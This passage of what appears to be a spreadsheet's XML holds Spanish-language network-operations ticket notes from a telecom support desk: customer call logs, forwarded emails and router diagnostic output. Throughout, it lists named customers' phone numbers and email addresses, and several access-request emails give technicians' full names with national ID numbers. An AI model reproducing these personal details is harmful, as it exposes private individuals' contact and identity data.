    <t>SE TERMINA LLAMDA CON EL AREA DE MONITOREO, REPSONDE FREDY SIMON QUIEN ME DICE QUE ENVIARA PERSONAL PARA QUE VALIDE EQUIPOS Y CONEXIONES DEL ENLACE PRINCIPAL APROXIMADAMENTE DE 2 HORAS Y 30 MINUTOS PARA TENER AVANCES.
1001982891
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:09:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 11:26:39</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESDRAS PEREZ AL  54206297 INDICA QUE DURANTE EL DIA DE HOY ESTARAN REALIZANDO PRUEBAS Y UNAS CONFIGURACIONES SOLICITA QUE SE LE LLAME MAÑANA A LAS 9.30 AM NUEVAMENTE || SE NOTIFICA A GESTOR**
ID 1001941558
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ESDRAS PEREZ 54206297 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001164089</t>
  </si>
  <si>
    <t>SE RETROALIMENTO A CLIENTE   ESTUARDO SAQUICH VÍA TELEFONICA Y VIA CORREO. CLIENTE REALIZA PRUEBAS CON SU RED LAN.   CALL ID: 1001968482
RE: ENLACE ID 17400170 - 004AG-EL-PUENTE-ROOSEVELT - PÉRDIDA DE PAQUETES
JURGEN RENE BOCH CAAL
JUE 12/05/2022 10:57
BUEN DÍA ,
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMO QUE EL DÍA DE AYER A LAS 12:52 DEL MEDIODÍA, ESTE ENLACE SE ESCALO CON PERSONAL DE BACK OFFICE IP Y SE QUITO UN SERVICE POLICY A NIVEL DE CAPA 3 DEJANDO UNICAMENTE LA LIMITANTE EN UN DEMARCADOR DE FIBRA OPTICA A 5 MB, SOLICITAMOS SU APOYO REALIZANDO PRUEBAS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.
.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SAQUICH 59519771 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA, AUTORIZA CIERRE DE TICKET
-ID 2001264183</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 818 328 7110 PERO TAMPOCO RESPONDE, SE INTENTARA LUEGO
-ID 1001945281</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CECILIO LOPEZ 41836947 NO RESPONDE SE INTENTARA LUEGO
-ID 1001945161</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE HENRY CANO AL 84327762 INDICA QUE AHORITA ESTA EN UN EVENTO Y PUEDE ATENDER A PARTIR DE LAS 13:00 HRS **
ID 1001960159
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY CANO AL 84327762 INDICA QUE SE LE LLAME MAÑANA A LAS 9:00 AM PARA REALIZAR PRUEBAS **
ID 3001013884
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY CANO AL 84327762 INDICA QUE REALIZO PRUEBAS QUE  CAMBIO LA MASCARA DE RED INTERNAMENTE SE  PROBO LA IP 192.168.20 DE LA 4 A LA 6 Y NINGUNO ESTA ABIERTO Y QUE TAMBIEN PROBO LA IP PUBLICA PERO TAMPOCO ESTA ABIERTA Y LOS PUERTOS 8000 Y 8001 SON LOS QUE LE APARECEN CERRADOS Y SOLICITA QUE SE VERIFIQUE TAMBIEN LOS DNS YA QUE ESTE ES EL NUEVO DNS QUE TIENE 184.154.139.147 || SE NOTIFICA A GESTOR **
ID 3001105794
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY CANO AL 84327762 NO RESPONDE, SE INTENTARA LUEGO  **
ID 3001091662
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OVIDIO MORALES 59598859  INFORMA QUE VA EN RUTA, SOLICITA QUE SE LLAME A LAS 9 AM, TOMAR NOTA QUE EL EQUIPO MERAKI ESTA DESCONECTADO O APAGADO:
CC_TELGUA_GT_INTERNET_TIENDA_SANARATE#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/90001801354T/_/
GI0/1                          DOWN           DOWN     LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
NV0                            UP             UP
CC_TELGUA_GT_INTERNET_TIENDA_SANARATE#</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OVIDIO MORALES 59598859 RESPONDE GRISELDA SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001081708</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 17:13
PARA: JOSEGONZALEZ@BANPRO.COM.NI &lt;JOSEGONZALEZ@BANPRO.COM.NI&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE DICTAMEN TÉCNICO || SD1124577 || F4559058
BUENA TARDE
      EN SEGUIMIENTO AL TICKET SD1124577 SE REALIZA ENTREGA DE DICTAMEN TÉCNICO.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>F4559832</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:16
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; JOSUE ADALBERTO CORDOVA ORTIZ &lt;JOSUE.CORDOVA@FICOHSA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: F4559832 || 858389OH || OH1000014253/ALCANCE -
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE RUBY REYES 41517131 QUIEN VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CINDY LUCAS AL 41779711 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001965497
**</t>
  </si>
  <si>
    <t>SE LLAMA A CINDY PARA REALIZAR VALIDAR ESTADO DEL SERVICIO ACTUALMENTE SIN EMBARGO NO RESPONDE--
41779711</t>
  </si>
  <si>
    <t>F4559926</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR CRISTIAN
CONFIRMA SERVICIO OK INDICA QUE YA SE PUEDE CERRAR EL TICKET**
ID 1001972185
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA SOLICITARLE APOYO O EN DADO CASO VALIDAR SERVICIO SIN EMBARGO RESPONDE PERO AL PARECER NO ESCUCHA LLAMDA Y CORTA--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE ES NECESARIO ESPECIFICAR EL EN CORREO QUE ES NECESARIO TRAMITAR LOS ACCESOS CON EL CC POR LO QUE SOLICITA SE PUEDA COLOCAR EN COPIA A --  ECHOQUIN@5B.COM.GT --
Y SI ES NECESARIO APERTURAR EL ATM TAMBIEN ESPECIFICARLO EN EL CORREO
-ID 1001939608</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 14:32
PARA: AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: ESTION DE PERMISOS || ATM 285 || SD1124710 || F4559991
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:20
PARA: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ESTION DE PERMISOS || ATM 285 || SD1124710 || F4559991
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
ESTION DE PERMISOS || ATM 285 || SD1124710 || F4559991
GUARDADO: JUE 12/05/2022 10:21
BUENOS DIAS ESTIMADOS.
SOLICITAMOS DE SU APOYO PARA GESTIONAR ACCESOS EN EL CENTRO COMERCIAL PLAZA FLORIDA Y AL MISMO TIEMPO COORDINAR LA APERTURA DEL ATM 285, DEBIDO QUE EL PROBLEMA LO OBSERVAMOS EN EL MEDIO (COBRE).
QUEDO AL PENDIENTE DE SUS COMENTARIOS.
ATENTAMENTE:</t>
  </si>
  <si>
    <t>CLIENTE DARWIN DAVILA VALIDA EL E1 OPERATIVO, AUTORIZA EL CIERRE DEL CASO. 1001966671</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIELA WUINACK 55542421 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001181621</t>
  </si>
  <si>
    <t>SE LLAMA A MARIELA PRA SEGUIMIENTO SIN EMBARGO NO RESPONDE ENVIA A BUZON--
55542421</t>
  </si>
  <si>
    <t>SE LLAMA A MARIELA PARA SEGUIMIENTO DEL CASO PERO NO RESPONDE---
55542421</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO REYES-78615430 ##SE TIEEENE EN LINEA- ##COMENTA QUE YA POSEE LLAMADAS EN AMBAS VIAS ##SE PROCEDE AL CIERRE #VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA AL 53177405 INDICA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME A DOSIN LEIVA AL 33698549 **
ID 1001976240
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE RAMOS AL 30368203 INIDCA QUE LES URGE LA REPARACION Y PONE EN CONFERENCIA A LA SEÑORITA SOFIA RIVERA QUIEN INDICA QUE HABLARA CON ADMINISTRACION DEL EDIFICIO Y PEDIRA PERMISO PARA MAÑANA SOLICITA QUE SE LE LLAME EN 20 MIN AL NUMERO  30639992 PARA CONFIRMAR SI LE DIERON EL PERMISO Y LA HORA**
ID 2001049922
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SOFIA RIVERA 30639992 MENCIONA QUE PERSONAL TECNICO ESTA TRABAJANDO PERO POR PARTE DEL CC NO HAN INDICADO QUE NO SE PUEDE TRABAJAR
CLIENTE INDICA QUE YA ENVIO LOS PERMISOS AL CC Y NO HA TENIDO RESPUESTA
-ID 2001066680</t>
  </si>
  <si>
    <t>**LE LLAMA A CLIENTE DOSIN LEIVA AL 33698549 INDICA QUE AUN NO CUENTA CON SERVICIO || SE TRATA DE CONTACTAR A GESTOR NO SE OBTIENE RESPUESTA SE LE NOTIFICA PARA EL SEGUIMIENTO **
ID 1001978131
**
**</t>
  </si>
  <si>
    <t>F4560091</t>
  </si>
  <si>
    <t>SE ENCUENTRA REESTABLECIDO EL SERVICIO SE PORCEDE A REALIZAR LAS SIGUENTES VALIDACIONES DE FINALIZACION DE FALLA MASIVA
PE 10.184.12.9
ZAPOTE#SHO IP ROUTE VRF BARISTA 10.235.40.182
ROUTING TABLE: BARISTA
ROUTING ENTRY FOR 10.235.40.180/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 13682
  ADVERTISED BY BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA VLAN2753
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
ZAPOTE#SHO RUN INTER VLAN2753
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 133 BYTES
!
INTERFACE VLAN2753
 DESCRIPTION MPLS POLLO GRANJERO G105
 IP VRF FORWARDING BARISTA
 IP ADDRESS 10.235.40.181 255.255.255.252
END</t>
  </si>
  <si>
    <t>F4560093</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 RESPONDE ILIANA  MENCIONA QUE EL TICKET INTERNO YA ESTA CERRADO POR LO QUE AUTORIZA CIERRE DE TICKET
-ID 1001917401</t>
  </si>
  <si>
    <t>CLIENTE JOSUE CANIZ 41673388 VALIDA QUE EL SERVICIO YA ESTÁ EN FUNCIONAMIENTO. SE LE RECOMIENDA AL CLIENTE INSTALAR UN UPS PARA EL EQUIPO CISCO YA QUE DURANTE LA VISITA DEL TÉCNICO ANGEL SANDOVAL SE VERIFICÓ QUE EQUIPO ESTABA CONECTADO DIRECTAMENTE AL TOMACORRIENTE DE LAS INSTALACIONES, SIN UPS, Y SE TUVO QUE CONECTAR EL EQUIPO A OTRO TOMACORRIENTE YA QUE DONDE ESTABA SE TENÍA INESTABILIDAD EN LA ENERGÍA. CLIENTE AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 1001991367</t>
  </si>
  <si>
    <t>SE LLAMA A CLEITNE  SR. RAFAEL MONTERROSO  42174563 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001978305</t>
  </si>
  <si>
    <t>CLEINTE CARLOS MADRID-31472163  VALIDA SERVICIO ##CCOMENTA QUE YA TEIENE LLAMADAS ENTRANTES Y SALIENTES ##TODO EXITOSO##</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE INDICANDO QUE NO ES NECESARIO LABORES EN ALTURAS, PERO QUE SI SE CUENTA CON DICHA CERTIFICACIÓN. A LA ESPERA DE CONFIRMACIÓN DE ACCESOS***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 11:13
PARA: GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: 944524OH || IMCRL004735 || CARGILL DE HONDURAS
ESTIMADOS BUEN DÍA,
COMENTO QUE NO ES NECESARIO REALIZAR LABORES EN ALTURAS ADICIONAL SI SE CUENTA CON DICHA CERTIFICACIÓN, POR LO QUE SE SOLICITA DE SU APOYO CONFIRMAR UNA FECHA Y HORA PARA LA VISITA. ASÍ COMO LA AUTORIZACIÓN DE ACCESOS DEL PERSONAL DESCRITO:
NOMBRE: ORLIN FUENTES
CÉDULA: 1618-1986-00852
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.
DE: GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 10:40
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: 944524OH || IMCRL004735 || CARGILL DE HONDURAS
ESTIMADOS BUEN DÍA,
EL CLIENTE SOLICITA ESPERAR DEBIDO A QUE NECESITAN CONSULTAR SI SE NECESITA CERTIFICACIÓN DEL PERSONAL PARA TRABAJOS EN ALTURAS Y PREGUNTA SI TENEMOS PERSONAL CERTIFICADO EN EL ÁREA.
BEST REGARDS | SALUDOS CORDIALES | CORDIAIS SAUDAÇÕES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO MENDOZA 525518521123  MENCIONA QUE EN PR SI TIENEN ENERGIA PERO COMENTA QUE SI ES NECESARIO ENVIAR A PERSONAL TECNICO SE REQUIERE TOMAR UNA CHARLA POR LO QUE SOLICITA SE VALIDE SI ES NECESARIO
CLIENTE BRINDA EL CORREO PARA COMPARTIR LOS DATOS DE PERSONAL TECNICO -- JULIO_MENDOZA@CRGL-THIRDPARTY.COM --
-ID 2001090728</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174-5299 RESPONDE GERARDO  MENCIONA QUE OBSERVAN CAIDO EL SERVICIO SE VALIDARA CON CLIENTE WALTER MAURICIO MUÑOZ TEL +50495825460
-ID 2001085616</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO MENDOZA COMENTA  QUE EL HORARIO DE ATENCION SERIA HORA DE OFICINAN POR LO QUE SOLICITA DATOS DEL TECNICO PARA PODER REALIZAR LA CAPACITACION ANTES DE PODER INGRESAR AL SITIO, SE SOLICITA DATOS A CCR HN Y SE ESTARA ENVIANDO POR CORREO A CLIENTE
2001100049
COLA:
NOMBRE: A: 00525518521123
NÚMERO: 00525518521123
DURACIÓN: 0:03:14
ESTADO: CONECTADA
DETALLES: 00525518521123
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 12/05/2022 17:19:38</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174-5299 RESPONDE FRIDA QUIEN SOLICITA LAS PRUEBAS DE OPERATIVIDAD POR CORREO Y LLAMADA EN 1 HORA CON 30 MIN
-ID 2001049987</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WALTER MAURICIO MUÑOZ 50495825460 QUIEN SOLICITA SE LLAME A JULIO MENDOZA - 52 5518521123
-ID 2001089374</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON LA RESOLUCION DEL PROBLEMA
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 15:20
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: 944524OH || IMCRL004735 || CARGILL DE HONDURAS
BUENAS TARDES.
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE SE IDENTIFICÓ MANIPULACIÓN A NIVEL PACTCORD, ENTRE EL SERVICIO EN MENCIÓN 192.168.239.110   Y LA FENTOCELDA, ESTO ENTRE EL MINI-ODF Y ETX1, EL SERVICIO SE MUESTRA OPERATIVO Y ESTABLE, ADJUNTO FOTOGRAFÍAS DE LOS EQUIPOS.
PING A WAN CLIENTE
&lt;CVILHNI2N1D1EIM1&gt;PING -C 1000 -S 500 -M 30 -B -VPN-INSTANCE VPN_CARGILL_0 192.168.239.110
  PING 192.168.239.110: 500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 192.168.239.110 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;CVILHNI2N1D1EIM1&gt;</t>
  </si>
  <si>
    <t>*** SE ENVIA DATO DE PERSONAL TÉCNICO A CLIENTE ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 10:35
PARA: HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: 944524OH || IMCRL004735 || CARGILL DE HONDURAS
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, FAVOR DE SU APOYO EN GESTIONAR LOS ACCESOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN, ELLO PARA LA VERIFICACIÓN DEL SERVICIO:
NOMBRE: ORLIN FUENTES
CÉDULA: 1618-1986-00852
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 CONTESTAN Y CORTAN LLAMADA SE INTENTA NUEVAMENTE Y DEJAN EN ESPERA LUEGO CONTESTA LA SEÑORITA GUADALUPE SANCHEZ SE LE INDICA QUE SE LE ENVIO CORREO INDICA QUE VALIDARA INFORMACION Y CUANDO TENGAN RESPUESTA NOS ESTARAN RESPONDIENDO**
ID 2001138098 - 2001138212
**</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE DORCAS GUARCHAJ 48654090 PARA CONSULTARLE SI NO SE TIENE PROBLEMAS DE ENERGIA ELECTRICA, CLIENTE INDICA QUE EL DIA DE AYER SI TUVIERON PROBLEMAS PERO QUE EL DIA DE HOY YA NO, SIN EMBARGO SE LE HACE MENCION AL CLIENTE QUE SE VALIDA QUE LA PROST SE CAE NO CONSTANTEMENTE PERO EN CIERTO TIEMPO, SE REALIZARON PRUEBAS DE LADO DEL NODO EL DIA DE AYER DE LA NOCHE Y DURANTE LA NOCHE NO SE TUVO PERDIDAS, LAS PERDIDAS EMPEZARON NUEVAMENTE CUANDO ENTRARON A LABORAL.
CLIENTE NOS CONFIRMA QUE LOS EQUIPOS ESTAN CONECTADOS A UN UPS SIN EMBARGO ELLA NO NOS PUEDE APOYAR A REVISAR POR QUE NO TIENE ACCESO Y LAS PERSONAS ENCARGADAS SON DE OTRA AREA, SE LE EXPLICA AL CLIENTE QUE SE ENVIARA PERSONAL TECNICO A CERTIFICAR EL SERVICIO Y LAS CONEXIONES PARA CONFIRMAR QUE NO SE HAYA DAÑADO LOS EQUIPOS POR EL BAJON DE ENERGIA DE AYER, PERO QUE ES NECESARIO QUE LA OTRA AREA LLEGUE PARA QUE PUEDAN REVISAR EN CONJUNTO
CLIENTE ENTERADA NDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO Y QUE ESTARA INFORMANDO AL PERSONAL
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE SOLICITANDO LOS PERMISOS PARA EL DIA DE MAÑANA
BUENOS TARDES ESTIMADA(O),
FAVOR DE APOYARNOS CON EL INGRESO A LOS TÉCNICOS PARA EL DÍA DE MAÑANA 13/05/2022 A SUS INSTALACIONES
 COOPERATIVA DE AHORRO Y CREDITO Y SERVICIOS VARIOS "LA UNIO ARGUETA" A PARTIR DE LAS 8:00AM
PARA LOS SIGUIENTES TÉCNICOS:
JAIME ROSALIO GÓMEZ MEJÍA 1948710020901
JOSE CARLOS SEMEYA 2158447770404
QUEDO A LA ESPERA DE SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE DORCAS GUARCHAJ QUIEN INDICA QUE SE PUEDE ATENDER EL SERVICIO EL DIA DE MAÑANA A PRIMERA HORA SIN INCONVENIENTES.
2001072218
COLA:
NOMBRE: A: 48654090
NÚMERO: 011 50248654090
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: +50248654090
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 15:40:19</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE DORCAS GUARCHAJ 48654090 PARA VALIDAR LA ESTABILIDAD DEL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DORCAS GUARCHAJ 48654090 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001220846</t>
  </si>
  <si>
    <t>DORCAS GUARCHAJ 48654090 PARA INFOMARLE LAS PRUEBAS REALIZADAS CON TECNICO, INDICA QUE ESTARA REALIZANDO PRUEBAS DE LLAMADAS COMENTA QUE SE LE CONTACTE A LAS 12:00 HRS PARA VALIDAR LAS MISMAS
##LLAMADA DESDE VIVO
##SE DETIENE TIEMPO E ESCALACION</t>
  </si>
  <si>
